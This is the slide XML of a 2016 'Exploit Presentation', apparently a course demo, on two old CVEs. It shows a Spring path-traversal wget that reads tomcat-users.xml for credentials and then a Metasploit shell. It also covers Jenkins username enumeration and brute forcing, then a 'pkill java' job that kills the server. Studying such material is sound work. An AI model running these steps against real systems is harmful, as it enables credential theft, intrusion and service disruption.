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9" r:id="rId8"/>
    <p:sldId id="270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83" d="100"/>
          <a:sy n="83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-31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8CA5-FEE5-4A85-921B-FD2B8F499A85}" type="datetime1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3468-7D2A-4028-AEA7-426711321B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9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F187-3660-4FF3-AF58-BDE4ACCD1CD1}" type="datetime1">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>30/11/2016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07A4-55F1-44BE-946F-4C6275799D1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70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A797-FECA-4863-B6F1-5712752FDC28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670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186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643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365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58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3704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F62-0A3D-443A-8AD8-86443FDA410C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B64-B829-41DB-8A8A-692E57C86A8A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5735-1F27-40A2-BE2F-D61DA323C134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B92-CA2B-4868-95E5-E4D9D75F5ABC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E6E7-491F-4060-9FCF-F865198FD8EB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7199-6096-4CDD-961C-26438CC77496}" type="datetime1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14D5-D1CA-43EC-9A3E-4951F16498E7}" type="datetime1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20BD-C90B-424E-9C01-403F51FC1BAA}" type="datetime1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25C7-03D7-4773-89AF-D96A9020C9D4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40E4-001E-4EEC-BFC3-0AF202B90770}" type="datetime1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CD8349-0497-4FA5-A497-D2AEAFB2913F}" type="datetime1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3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spring-projects/spring-framework/commit/3f68cd633f03370d33c2603a6496e81273782601#diff-ca3a08ce8b5af11bfc5f03aa7f426cd9R1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jenkinsci/jenkins/commit/fbf96734470caba9364f04e0b77b0bae7293a1ec#diff-de6af001ecaa93f85c803b52f8831a99R1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8000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EXPLOIT PRESENTATION</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="72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938954"/>
            <a:ext cx="9418320" cy="194432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 | CVE-2014-2064</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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2C8-EF9D-430B-B925-5C4E97CC2957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CVE-2014-2064 - VICTIM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-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SUMMARY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79414"/>
            <a:ext cx="4640400" cy="43038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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone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Obtain a Tomcat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manager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account from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tomcat-users.xml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via path traversal, and utilize the compromised account to access a shell on the server using Metasploit.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Spring &lt; 3.2.12 | &lt; 4.0.8 | &lt; 4.1.2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B44-160C-489D-8237-4091E009FCBE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3038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CVE-2014-2064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Using Jenkins’ login API and exploiting its incorrect error reporting behavior, perform a brute force attack to first find an existing username, and then the associated password. Any dictionary can be used among simple enumeration.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Jenkins &lt; 1.532 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31901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3774"/>
            <a:ext cx="10353762" cy="239561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Spring exposes a specific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/resources/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path to access a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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webapp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public resources: checks are made in case relative paths are given (e.g. no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../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allowed); if an absolute path is given though, it is transformed in a relative path without ensuring the requested content is actually within the resources directory.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C1C-6899-41CA-BCD3-2A9A794C26D5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8923" r="5269" b="53231"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="923030" y="3988626"/>
            <a:ext cx="10353762" cy="13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Java 8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Spring 4.0.1 or Spring 4.1.1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tomcat-users.xml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exists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whoami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tomcat7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ls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var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/lib/tomcat7</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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 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etc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passwd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system users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CVE-2014-3625 - ATTACKER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160" y="2082018"/>
            <a:ext cx="4027579" cy="40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wget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http://localhost:8080/spring-app/ resources/file:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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var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/lib/tomcat7/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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conf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/tomcat-users.xml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obtain manager credentials</a:t>
            </a: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start the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Ubuntu Mono" panose="020B0509030602030204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msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Ubuntu Mono" panose="020B0509030602030204"/>
              <a:ea typeface="Microsoft YaHei UI Light" panose="020B0502040204020203" pitchFamily="34" charset="-122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set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attack parameters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HTTPUSERNAME</a:t>
            </a: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HTTPPASSWORD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RHOST</a:t>
            </a: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RPORT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exploit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7155" y="1577816"/>
            <a:ext cx="4739539" cy="4056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AUTOMATED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./exploit.py CVE-2014-3625 &lt;address&gt;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CVE-2014-3625 - VICTIM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-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CVE-2014-2064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0050"/>
            <a:ext cx="10353761" cy="160470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Jenkins’ API provide a login endpoint that returns a different error when a non-existing user requests access as opposed to a existing user with the incorrect password. This allows enumeration of the existing accounts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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D73-9F02-4C7D-85D8-74FDA869ED9B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5179" r="55000" b="31898"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="913794" y="3465882"/>
            <a:ext cx="10295180" cy="19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CVE-2014-2064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Jenkins 1.531 or Jenkins 1.503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Jenkins secured access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Server killed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CVE-2014-3625 - ATTACKER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160" y="2082018"/>
            <a:ext cx="4027579" cy="40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Attempt API login with multiple usernames and fake password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Check for username existing error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failed to login as</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Brute force password through existing username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Create a job with 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pkill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java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7155" y="1577816"/>
            <a:ext cx="4739539" cy="4056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AUTOMATED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Modify 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config.json</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Node brute.js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5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570</TotalTime>
  <Words>409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Microsoft YaHei UI Light</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calisto MT</vt:lpstr>
      <vt:lpstr>Microsoft Sans Serif</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Ubuntu Mono</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Slate</vt:lpstr>
      <vt:lpstr>EXPLOIT PRESENTATION</vt:lpstr>
      <vt:lpstr>SUMMARY</vt:lpstr>
      <vt:lpstr>CVE-2014-3625</vt:lpstr>
      <vt:lpstr>CVE-2014-3625</vt:lpstr>
      <vt:lpstr>CVE-2014-3625 - ATTACKER</vt:lpstr>
      <vt:lpstr>CVE-2014-3625 - VICTIM</vt:lpstr>
      <vt:lpstr>CVE-2014-2064</vt:lpstr>
      <vt:lpstr>CVE-2014-2064</vt:lpstr>
      <vt:lpstr>CVE-2014-3625 - ATTACKER</vt:lpstr>
      <vt:lpstr>CVE-2014-2064 - VICTIM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PRESENTATION</dc:title>
  <dc:creator>Mattia Affabris</dc:creator>
  <cp:lastModifiedBy>alessandro pezzè</cp:lastModifiedBy>
  <cp:revision>83</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-11-05T15:24:52Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-11-30T11:43:19Z</dcterms:modified>
</cp:coreProperties>
</file>